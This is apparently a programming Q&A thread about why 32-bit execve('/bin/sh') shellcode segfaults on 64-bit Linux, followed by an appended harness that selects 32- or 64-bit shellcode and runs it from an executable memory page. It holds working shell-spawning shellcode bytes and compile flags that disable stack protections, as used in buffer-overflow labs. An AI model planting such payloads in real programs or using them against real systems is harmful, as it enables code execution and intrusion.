
I'm trying to run this shellcode but I keep getting a segmentation fault

/* call_shellcode.c */
/*A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
const char code[] =
   "\x31\xc0" /* Line 1: xorl %eax,%eax */
   "\x50" /* Line 2: pushl %eax */
   "\x68""//sh" /* Line 3: pushl $0x68732f2f */
   "\x68""/bin" /* Line 4: pushl $0x6e69622f */
   "\x89\xe3" /* Line 5: movl %esp,%ebx */
   "\x50" /* Line 6: pushl %eax */
   "\x53" /* Line 7: pushl %ebx */
   "\x89\xe1" /* Line 8: movl %esp,%ecx */
   "\x99" /* Line 9: cdq */
   "\xb0\x0b" /* Line 10: movb $0x0b,%al */
   "\xcd\x80" /* Line 11: int $0x80 */
   ;
int main(int argc, char **argv)
{
   char buf[sizeof(code)];
   strcpy(buf, code);
   ((void(*)( ))buf)( );
}

I compile it using:

 gcc -z execstack -o call_shellcode call_shellcode.c

and

 gcc -fno-stack-protector -z execstack -o call_shellcode call_shellcode.c

But I keep getting a segmentation fault.

Also, I'm running a 64-bit Linux system (Ubuntu).

  • On x86-64 to exec a syscall the instruction is "syscall", not "int 0x80". Commented Nov 8, 2017 at 9:29

3 Answers


You are using 32-bit assembly code on an x86-64 system. So that is your problem: you have to create your shellcode for x86-64 systems.

E.g.

  400078:   48 31 c0                xor    rax,rax
  40007b:   48 bf 2f 2f 62 69 6e    movabs rdi,0x68732f6e69622f2f
  400082:   2f 73 68 
  400085:   48 31 f6                xor    rsi,rsi
  400088:   56                      push   rsi
  400089:   57                      push   rdi
  40008a:   48 89 e7                mov    rdi,rsp
  40008d:   48 31 d2                xor    rdx,rdx
  400090:   b0 3b                   mov    al,0x3b
  400092:   0f 05                   syscall 

One of the main differences from 32-bit assembly is how to use the syscalls. In this link, Linux Syscalls x86-64, you can see which registers you need to call sys_execve:

int execve(const char *filename, char *const argv[], char *const envp[]);

  • const char *filename -> rdi
  • char *const argv[] -> rsi
  • char *const envp[] -> rdx

E.g.

  #include <stdlib.h>
  #include <stdio.h>
  #include <string.h>

  const char code[] = "\x48\x31\xc0\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\xf6\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05";
  int main(int argc, char **argv)
  {
       char buf[sizeof(code)];
       strcpy(buf, code);
       ((void(*)( ))buf)( );
  }

Compile and test it:

$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
$ ./shellcode 
$ uname -a
 Linux foobar 4.4.0-97-generic #120-Ubuntu SMP Tue Sep 19 17:28:18 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux



code doesn't have a trailing null byte, so you can't use strcpy() to copy it. Use memcpy().

memcpy(buf, code, sizeof(code));

As mentioned in a comment, the shellcode you have is for 32-bit Linux, but you're trying to run it on a 64-bit system. That probably explains the error after fixing this.

Comments

  • Still getting a segmentation fault.
  • I used gdb and got 0x00007fffffffe1d8 in ?? ()
  • Do a stack trace to see which line in your program it is.
  • I keep getting ?? ()
  • @KevinJones You got a segmentation fault because it is a 32-bit shellcode.


You forgot the -m32 flag for compiling a 32-bit binary on a 64-bit system. It looks like this is what you need:

gcc -m32 -z execstack -o call_shellcode call_shellcode.c

In order to be able to compile 32-bit binaries on a 64-bit system you need the 32-bit libraries available. On Ubuntu based systems you can install them via:

sudo apt-get install gcc-multilib

See: https://www.homeworkforyou.com/static_media/uploadedfiles/bufoverflow.pdf
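The three answers describe one mismatch from two sides: the 32-bit payload from the question (int 0x80, eax=11, ebx/ecx/edx) only works in a 32-bit process (gcc -m32), and a 64-bit process needs the syscall-based payload from the accepted answer (rax=59, rdi/rsi/rdx). The harness below is an added example, not code from the question or any of the answers. It picks the payload from the compiler's target macros so that the wrong one can never be copied into the process, scans the payload for NUL bytes before delivery (the bytes from both the question and the accepted answer contain none, and the C string literal supplies the terminating NUL, so strcpy copies the whole payload; memcpy with an explicit length removes that dependence anyway), and runs it from an mmap'd RWX page instead of -z execstack. The function names, the mmap approach and the refusal to run on non-x86 targets are my choices, not the page's.

```c
/* run_shellcode.c: added example. Build with
 *   gcc run_shellcode.c -o run_shellcode          (64-bit payload)
 *   gcc -m32 run_shellcode.c -o run_shellcode     (32-bit payload, needs gcc-multilib)
 * No -z execstack is needed: the payload runs from an mmap'd RWX page. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

/* x86-64: execve("//bin/sh", NULL, NULL) through the `syscall` instruction.
 * Bytes as shown in the accepted answer: rax=59, rdi=path, rsi=argv, rdx=envp. */
const unsigned char shellcode_x86_64[] = {
    0x48,0x31,0xc0,                                    /* xor    rax,rax         */
    0x48,0xbf,0x2f,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68, /* movabs rdi,"//bin/sh"  */
    0x48,0x31,0xf6,                                    /* xor    rsi,rsi         */
    0x56,                                              /* push   rsi (terminator)*/
    0x57,                                              /* push   rdi (the path)  */
    0x48,0x89,0xe7,                                    /* mov    rdi,rsp         */
    0x48,0x31,0xd2,                                    /* xor    rdx,rdx         */
    0xb0,0x3b,                                         /* mov    al,59 (execve)  */
    0x0f,0x05                                          /* syscall                */
};

/* i386: the same execve through `int 0x80`. Bytes as shown in the question:
 * eax=11, ebx=path, ecx=argv, edx=envp. */
const unsigned char shellcode_i386[] = {
    0x31,0xc0,                 /* xor  eax,eax          */
    0x50,                      /* push eax              */
    0x68,0x2f,0x2f,0x73,0x68,  /* push "//sh"           */
    0x68,0x2f,0x62,0x69,0x6e,  /* push "/bin"           */
    0x89,0xe3,                 /* mov  ebx,esp          */
    0x50,                      /* push eax              */
    0x53,                      /* push ebx              */
    0x89,0xe1,                 /* mov  ecx,esp          */
    0x99,                      /* cdq  (edx = 0)        */
    0xb0,0x0b,                 /* mov  al,11 (execve)   */
    0xcd,0x80                  /* int  0x80             */
};

/* Select the payload at compile time, so a 32-bit payload cannot end up in a
 * 64-bit process (the cause of the SIGSEGV in the question). */
#if defined(__x86_64__)
#  define SHELLCODE shellcode_x86_64
#  define SHELLCODE_ARCH "x86_64"
#elif defined(__i386__)
#  define SHELLCODE shellcode_i386
#  define SHELLCODE_ARCH "i386"
#else
#  define SHELLCODE_ARCH "unsupported"   /* assumption: refuse to run anything */
#endif

const char *selected_arch(void) { return SHELLCODE_ARCH; }

size_t selected_len(void) {
#ifdef SHELLCODE
    return sizeof(SHELLCODE);
#else
    return 0;
#endif
}

/* Index of the first NUL byte in a payload, or -1 if there is none.
 * A NUL would stop strcpy() early, so a payload meant for string-copy
 * delivery must be free of them. */
long first_nul_byte(const unsigned char *p, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0) return (long)i;
    return -1;
}

/* Copy the payload into a fresh RWX mapping and jump to it. Returns only if
 * mmap fails or the shellcode itself returns; a successful execve never does. */
int run_shellcode(const unsigned char *p, size_t n) {
    void *page = mmap(NULL, n, PROT_READ | PROT_WRITE | PROT_EXEC,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED) { perror("mmap"); return -1; }
    memcpy(page, p, n);           /* explicit length: no reliance on a NUL */
    ((void (*)(void))page)();
    return 0;
}

int main(void) {
#ifndef SHELLCODE
    fprintf(stderr, "no shellcode for this architecture\n");
    return 1;
#else
    long nul = first_nul_byte(SHELLCODE, sizeof(SHELLCODE));
    if (nul >= 0) {
        fprintf(stderr, "payload has a NUL byte at offset %ld\n", nul);
        return 1;
    }
    printf("running %zu-byte %s shellcode\n", sizeof(SHELLCODE), SHELLCODE_ARCH);
    return run_shellcode(SHELLCODE, sizeof(SHELLCODE));
#endif
}
```

Running it on a 64-bit Ubuntu gives the same result as the accepted answer's session (a shell prompt, where `uname -a` reports x86_64); building with -m32 runs the question's payload in a 32-bit process instead. Because the selection is made by the compiler rather than by the person typing the gcc command, forgetting -m32 now produces a different binary rather than a segfault.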
